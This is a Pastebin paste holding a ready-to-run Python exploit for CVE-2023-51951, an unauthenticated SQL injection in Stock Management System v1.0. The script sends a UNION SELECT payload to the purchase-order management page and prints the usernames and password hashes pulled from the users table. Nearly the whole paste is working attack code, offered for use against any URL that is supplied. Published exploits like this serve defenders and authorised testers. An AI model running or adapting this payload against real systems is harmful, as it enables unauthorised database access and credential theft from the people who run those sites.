Advertisement
FlyFar

Stock Management System v1.0 - Unauthenticated SQL Injection - CVE-2023-51951

Apr 18th, 2024
895
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.55 KB | Cybersecurity | 1 0
  1. # Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
  2. # Date: February 6, 2024
  3. # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
  4. # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
  5. # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
  6. # Tested on: Linux and Windows, XAMPP
  7. # CVE-2023-51951
  8. # Vendor: oretnom23
  9. # Version: v1.0
  10. # Exploit Description:
  11. #   The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
  12.  
  13. import requests
  14. from bs4 import BeautifulSoup
  15. import argparse
  16.  
  17. def print_header():
  18.     print("\033[1m\nStock Management System v1.0\033[0m")
  19.     print("\033[1mSQL Injection Exploit\033[0m")
  20.     print("\033[96mby blu3ming\n\033[0m")
  21.  
  22. def parse_response(target_url):
  23.     try:
  24.         target_response = requests.get(target_url)
  25.         soup = BeautifulSoup(target_response.text, 'html.parser')
  26.         textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
  27.  
  28.         # Split the text using ',' as a delimiter
  29.         users = textarea_text.split(',')
  30.         for user in users:
  31.             # Split username and password using ':' as a delimiter
  32.             username, password = user.split(':')
  33.             print("| {:<20} | {:<40} |".format(username, password))
  34.     except:
  35.         print("No data could be retrieved. Try again.")
  36.  
  37. def retrieve_data(base_url):
  38.     target_path = '/sms/admin/?page=purchase_order/manage_po&id='
  39.     payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
  40.  
  41.     #Dump users table
  42.     target_url = base_url + target_path + payload
  43.     print("+----------------------+------------------------------------------+")
  44.     print("| {:<20} | {:<40} |".format("username", "password"))
  45.     print("+----------------------+------------------------------------------+")
  46.     parse_response(target_url)
  47.     print("+----------------------+------------------------------------------+\n")
  48.  
  49. if __name__ == "__main__":
  50.     about  = 'Unauthenticated SQL Injection Exploit - Stock Management System'
  51.     parser = argparse.ArgumentParser(description=about)
  52.     parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
  53.     args = parser.parse_args()
  54.     print_header()
  55.     retrieve_data(args.base_url)
  56.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement